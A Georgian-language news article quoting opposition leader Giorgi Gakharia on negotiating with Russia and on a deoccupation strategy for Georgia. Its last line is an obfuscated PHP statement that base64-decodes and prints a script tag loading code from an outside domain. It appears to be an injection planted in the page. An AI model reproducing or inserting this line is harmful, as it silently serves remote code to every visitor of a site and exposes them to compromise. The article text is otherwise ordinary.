celsiusi
ავერსი შნაიდერი
მტერსაც, ოკუპანტსაც უნდა ველაპარაკოთ - პრაგმატულად, ცივი გონებით, ეს ჩვენი გასაკეთებელია! რაც უფრო დავაგვიანებთ, მით უფრო დავზიანდებით!- ამის შესახებ პარტია "საქართველოსთვის" ლიდერმა გიორგი გახარიამ რუსეთთან ურთიერთობის საკითხზე განაცხადა.
 
მან ასევე ხაზი გაუსვა, რომ ქვეყნის ტერიტორიული მთლიანობის პრობლემების მოსაგვარებლად ოკუპანტ ქვეყანას საქართველოს ნაცვლად ვერავინ დაელაპარაკება, თუმცა ეს უნდა იყოს მხარდაჭერილი საქართველოს საერთაშორისო პარტნიორების მხრიდან.
 
„ერთი რამე უნდა გვესმოდეს ყველას - მტერსაც უნდა ველაპარაკოთ - ჩვენი სალაპარაკოა ეს! არავინ ჩვენს ნაცვლად არ დაელაპარაკება ოკუპანტს - ეს ნაბიჯები ჩვენ უნდა გადავდგათ პრაგმატულად, ცივი გონებით, მაგრამ ეს ჩვენი გასაკეთებელია! რაც უფრო გვიან გავაკეთებთ ამას, მით უფრო დავზიანდებით! დღეს ყველას უნდა გვესმოდეს, რომ ჩვენს გარდა ამას არავინ გააკეთებს და, რა თქმა უნდა, ეს უნდა იყოს მხარდაჭერილი ჩვენი საერთაშორისო პარტნიორების მხრიდან“ - განაცხადა გიორგი გახარიამ.
 
მისივე შეფასებით, შეუძლებელია, რომ ქვეყანას, რომლის 20% ოკუპირებულია - არ ჰქონდეს გააზრებული, მკაფიო და ერთმნიშვნელოვანი სტრატეგია, როგორ აპირებს ქვეყნის დეოკუპაციას. გახარიას თქმით, ასეთი სტრატეგიის არქონა მოქმედებს ყველაფერზე, მათ შორის, ეკონომიკურ განვითარებასა და პარტნიორებთან ურთიერთობაზე.
 
„შეუძლებელია ოკუპირებულ ქვეყანას, რომლის 20% ოკუპირებულია, არ ჰქონდეს გააზრებული, მკაფიო და ერთმნიშვნელოვანი სტრატეგია, როგორ აპირებს ქვეყნის დეოკუპაციას. ასეთი სტრატეგიის არქონა მოქმედებს ყველაფერზე: ეკონომიკურ განვითარებაზე, პარტნიორებთან ურთიერთობაზე - ყველაფერზე! პირველი, რაც გასაკეთებელია - ქვეყანას უნდა ჰქონდეს მკაფიო წარმოდგენა, როგორია საქართველოს დეოკუპაციის სტრატეგია. ამ დეოკუპაციის სტრატეგიის ერთი პატარა ნაწილი უნდა იყოს დებორდერიზაციის გეგმა, რომელიც ქვეყანას უნდა ჰქონდეს, რადგან ჩვენს აფხაზ და ოს ძმებთან ხიდებს ვერ ავაშენებთ, თუ ფიზიკური წვდომა არ გვქონდა ერთმანეთთან და მავთულხლართებით ვიყავით გაყოფილი, ეს ძალიან მნიშვნელოვანია“, - განაცხადა გახარიამ.
1593
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");